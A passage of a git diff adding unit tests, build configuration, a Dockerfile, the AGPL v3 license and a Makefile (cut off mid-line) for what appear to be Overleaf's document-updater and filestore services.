.should.equal(true) + }) + }) + + describe('when the method returns an error', function () { + beforeEach(async function () { + this.error = new Error('something went wrong') + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + this.method = sinon.stub().rejects(this.error) + await expect( + this.UpdateManager.promises.lockUpdatesAndDo( + this.method, + this.project_id, + this.doc_id, + this.arg1 + ) + ).to.be.rejectedWith(this.error) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + }) + }) +}) + +function stringHash(s) { + const hash = createHash('sha1') + hash.update(s) + return hash.digest('hex') +} diff --git a/services/document-updater/test/unit/js/UtilsTests.js b/services/document-updater/test/unit/js/UtilsTests.js new file mode 100644 index 0000000..5d0f03c --- /dev/null +++ b/services/document-updater/test/unit/js/UtilsTests.js @@ -0,0 +1,54 @@ +// @ts-check + +const { createHash } = require('node:crypto') +const { expect } = require('chai') +const Utils = require('../../../app/js/Utils') + +describe('Utils', function () { + describe('addTrackedDeletesToContent', function () { + it("doesn't modify text without tracked deletes", function () { + const content = 'the quick brown fox' + const trackedChanges = [] + const result = Utils.addTrackedDeletesToContent(content, trackedChanges) + expect(result).to.equal(content) + }) + + it('adds tracked deletes to text but skips tracked inserts', function () { + const content = 'the brown fox jumps over the dog' + const metadata = { user_id: 'user1', ts: new Date().toString() } + const trackedChanges = [ + { id: 'tc1', op: { d: 'quick ', p: 4 }, metadata }, + { id: 'tc2', op: { i: 'brown ', p: 5 }, metadata }, + { id: 'tc3', op: { d: 'lazy ', p: 29 }, metadata }, + ] + const result = Utils.addTrackedDeletesToContent(content, trackedChanges) + expect(result).to.equal('the quick brown fox jumps over the lazy dog') + }) + }) + + describe('computeDocHash', function () { + it('computes the hash for an empty doc', function () { + const actual = Utils.computeDocHash([]) + const expected = stringHash('') + expect(actual).to.equal(expected) + }) + + it('computes the hash for a single-line doc', function () { + const actual = Utils.computeDocHash(['hello']) + const expected = stringHash('hello') + expect(actual).to.equal(expected) + }) + + it('computes the hash for a multiline doc', function () { + const actual = Utils.computeDocHash(['hello', 'there', 'world']) + const expected = stringHash('hello\nthere\nworld') + expect(actual).to.equal(expected) + }) + }) +}) + +function stringHash(s) { + const hash = createHash('sha1') + hash.update(s) + return hash.digest('hex') +} diff --git a/services/document-updater/tsconfig.json b/services/document-updater/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/document-updater/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/filestore/.gitignore b/services/filestore/.gitignore new file mode 100644 index 0000000..a2f4b5a --- /dev/null +++ b/services/filestore/.gitignore @@ -0,0 +1,54 @@ +compileFolder + +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? +Thumbs.db + +/node_modules/* +data/*/* + +**/*.map +cookies.txt +uploads/* + +user_files/* +template_files/* + +**.swp + +/log.json +hash_folder + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/filestore/.mocharc.json b/services/filestore/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/filestore/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/filestore/.nvmrc b/services/filestore/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/filestore/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/filestore/.prettierignore b/services/filestore/.prettierignore new file mode 100644 index 0000000..3c3629e --- /dev/null +++ b/services/filestore/.prettierignore @@ -0,0 +1 @@ +node_modules diff --git a/services/filestore/Dockerfile b/services/filestore/Dockerfile new file mode 100644 index 0000000..8e336d4 --- /dev/null +++ b/services/filestore/Dockerfile @@ -0,0 +1,31 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/filestore +COPY services/filestore/install_deps.sh /overleaf/services/filestore/ +RUN chmod 0755 ./install_deps.sh && ./install_deps.sh + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/filestore/package.json /overleaf/services/filestore/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/filestore/ /overleaf/services/filestore/ + +FROM app +RUN mkdir -p uploads user_files template_files \ +&& chown node:node uploads user_files template_files +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/filestore/LICENSE b/services/filestore/LICENSE new file mode 100644 index 0000000..ac8619d --- /dev/null +++ b/services/filestore/LICENSE @@ -0,0 +1,662 @@ + + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/filestore/Makefile b/services/filestore/Makefile new file mode 100644 index 0000000..cc17245 --- /dev/null +++ b/services/filestore/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = filestore +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo 